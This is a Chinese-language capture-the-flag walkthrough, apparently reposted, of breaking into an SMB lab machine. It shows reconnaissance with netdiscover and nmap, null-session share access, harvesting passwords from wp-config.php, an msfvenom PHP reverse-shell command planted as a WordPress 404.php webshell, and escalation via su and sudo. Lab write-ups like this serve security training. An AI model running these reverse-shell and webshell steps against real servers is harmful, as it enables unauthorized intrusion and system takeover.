CTF-SMB滲透


環境

Kali ip 192.168.56.102

Smb 靶機ip 192.168.56.103  靶場下載:

鏈接:https://pan.baidu.com/s/1OwNjBf7ZEGmFlRq79bkD_A
提取碼:0eg6

 

信息探測

使用netdiscover -r ip/mask 進行內網網段存活ip探測

 

 

 

 

靶機為103

 

 

 

進行nmap端口探測和服務信息探測

 

nmap -sV -T4 -A 192.168.56.103

 

 

 

 

 

 

可以看到smb服務

 

針對SMB協議,使用空口令,若口令嘗試登陸,並查看敏感文件,下載查看

 

 

0x01針對於開放服務進行弱口令嘗試

smbclient -L 192.168.56.103

 

 

連接成功

 

分別查看三個共享連接是否有flag等敏感文件

 

smbclient \\IP\$share’  查看文件

 

 

嘗試到share$連接時 發現可以空口令連接

 

查看文件

 

 

 

 

Robots.txt里的目錄 每個查看后無果

查看deets.txt

 

 

 

 

發現一個密碼為12345

然后繼續查看敏感文件

 

Cd wordpress目錄

 

 

 

 

 

發現敏感文件wp-config.php

 

 

 

 

 

讀取到數據密碼

嘗試用數據庫密碼和12345登錄到Mysql  ssh

 

 

 

 

 

 

均失敗

 

0x02針對於開放服務器的版本 嘗試溢出漏洞

 

嘗試searchsploit samba版本號 看看有沒有現成的溢出漏洞

嘗試過后無果

 

 

0x03針對於開放服務 進行深入信息探測

主機開放了80端口 針對於http服務 再次做信息探測

 

使用到的工具 dirb nikto owasp-zap進行目錄掃描 漏洞掃描

 

 

 

 

 

 

 

 

 

 

發現后台地址

http://192.168.56.103/wordpress/wp-admin/

 

 

嘗試使用我們得到的數據庫密碼和之前12345登錄

 

使用數據庫密碼登錄后台成功

 

 

 

 

后台程序為wordpress

想辦法上傳我們的webshell

 

 

0x04 webshell生成和上傳

 

使用msfvenom生成php反彈shell

msfvenom -p php/meterpreter/reverse_tcp lhost=攻擊機IP地址 lport=4444 -f raw > /root/Desktop/shell.php

 

 

 

 

 

 

 

后台上傳webshell

 

 

 

 

在后台的模版 可以直接插入我們的php代碼

 

 

我插入的404頁面的代碼

 

 

保存成功后  msf開始監聽反彈的shell

 

 

 

 

 

 

 

 

 

訪問靶機404.php 執行反彈shell

http://靶場IP/wordpress/wp-content/themes/twenty

Fifteen/404.php

 

 

 

 

 

拿到shell后  找到和flag有關的信息和文件

優化終端:

python -c "import pty; pty.spawn('/bin/bash')"

 

 

 

 

 

先查找用戶名: cat /etc/passwd

 

 

 

 

發現有個在home目錄下的togie 猜測是用戶名

 

 

 

--  su  用戶名

--  sudo l

--  su sudo

 

嘗試切換到togie用戶 發現需要密碼 輸入之前得到的12345

 

切換成功

 

 

 

 

查看root可以執行哪些目錄的操作

sudo -l

 

 

發現有這些目錄

 

 

提升權限

 

Sudo su

 

 

root目錄下

 

 

最后成功拿到查看flag.txt 拿到flag

 

 

 

完畢。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM